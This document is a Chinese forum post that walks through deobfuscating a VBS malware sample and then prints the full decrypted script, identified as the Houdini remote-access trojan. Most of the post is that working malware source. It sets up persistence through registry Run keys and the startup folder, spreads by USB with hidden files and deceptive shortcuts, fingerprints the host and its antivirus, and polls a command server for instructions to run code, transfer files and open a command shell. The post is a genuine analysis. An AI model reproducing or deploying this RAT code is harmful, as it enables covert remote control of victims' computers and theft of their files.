1、申 请 I D:smldhz
2、个人邮箱:
3、原创技术文章:
看到这个帖子https://www.52pojie.cn/thread-716901-1-1.html,想回复发现以前账号早就没了。这里写一下分析过程,能搞个账号最好,不能的话 @你有毒吧 童鞋来这里看分析吧。
首先下载vbs脚本 vscode打开,能看到的是一堆“乱码“,不过也有一定的规律。既然能正常执行,那么肯定至少格式是正确的,搜索冒号":"替换为换行"\n",能让代码看起来稍微清爽一点
然后搜索"(",能找到几处函数和调用,贴一下关键地方
[JavaScript] 纯文本查看 复制代码 Ai4R2j1Q2k3P5l7O8m6N4n3M2=split(Ai4R2j1Q2k3P5l7O8m6N4n3M2,"8-f��A��**�����?��?��?�������?���?227596903�???��?�?/R8-f��A��**��297575474���?���?�???��?����?���?�???�259122682?���?�???��?�?/R8-")
for A5l7O8=0 to ubound(Ai4R2j1Q2k3P5l7O8m6N4n3M2) -1
A1d2W3e4V5f6U7g5T4h8S9i=A1d2W3e4V5f6U7g5T4h8S9i & ChrW(Ai4R2j1Q2k3P5l7O8m6N4n3M2(A5l7O8))
next
把Ai4R2j1Q2k3P5l7O8m6N4n3M2字符串用后面的一长串字符来分割,得到的数字转成字符拼接到一起,按这个逻辑跑一遍 得到
[JavaScript] 纯文本查看 复制代码 nTWAAKaqMncGOLE = "KcSqLBYLmrPGgXL" + ChrW(160)
Public Function YPcXDTqcWJAjkyz(NMWZrwnYxTfZmaV , ffLzcAEAXYFzttk )
For GGoBjvuWeIryKEA = ChrW(40 + 9) TO (sjDhJwZgbCUrTGO(ffLzcAEAXYFzttk) / ChrW(25 + 25))
rjjHfVnrNbUrHmS = IzPqzmyebBLAxJy(ChrW(30 + 8 )& ChrW(70 + 2) + (MID(ffLzcAEAXYFzttk, (ChrW(40 + 10) * GGoBjvuWeIryKEA) - ChrW(40 + 9), ChrW(60 -10))))
SJDGzcxYdFDRtJy = ASC(MID(NMWZrwnYxTfZmaV, ((GGoBjvuWeIryKEA Mod sjDhJwZgbCUrTGO(NMWZrwnYxTfZmaV)) & ChrW(40 +9)), ChrW(40 + 9)))
if nTWAAKaqMncGOLE = "KcSqLBYLmrPGgXL" + ChrW(160) then
jUtslSFfKIqWNav = jUtslSFfKIqWNav + ChrW(rjjHfVnrNbUrHmS XoR SJDGzcxYdFDRtJy)
end if
Next
YPcXDTqcWJAjkyz = jUtslSFfKIqWNav
End Function
Function IzPqzmyebBLAxJy (CcRvOWqsCUejGXf)
IzPqzmyebBLAxJy = Eval (CcRvOWqsCUejGXf)
end Function
Function sjDhJwZgbCUrTGO (MloZCRGnuGUMUHS)
sjDhJwZgbCUrTGO = Len (MloZCRGnuGUMUHS)
end Function
if nTWAAKaqMncGOLE = "KcSqLBYLmrPGgXL" + ChrW(160) then
nFattSGfzkORuQE = ""
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
Wscript.Sleep 1000
Execute (YPcXDTqcWJAjkyz ( ChrW(63) ,nFattSGfzkORuQE))
dIm nsTeqFJRvCeWtsf
end if
篇幅关系把nFattSGfzkORuQE 后面的一堆hex字符用xxxx代替了
看到有个Execute,说明至少解密了一层了,要继续解密得先用YPcXDTqcWJAjkyz函数解一层,直接把execute替换成写文件
[JavaScript] 纯文本查看 复制代码 Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile ("output.vbs", 2, True)
objTextFile.Write (YPcXDTqcWJAjkyz ( ChrW(63) ,nFattSGfzkORuQE))
objTextFile.close()
打开output.vbs发现已经是解密完了,原始文件前前后后那么多的 随机字符串=随机字符串 只是掩护罢了,并没有实际作用的样子。
附上解密完的脚本
[JavaScript] 纯文本查看 复制代码 '<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "txxxxtno.publicvm.com"
port = 5054
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
一个年代非常久远的vbs恶意代码,运行后连接txxxxtno.publicvm.com 获取进一步操作命令。百度搜索第一行的文字('<[ recoder : houdini (c) skype : houdini-fx ]>)可以看到有很多分析,这里就不继续了
|
吾爱游客
发表于 2018-3-27 22:37
发表于 2018-3-28 10:48
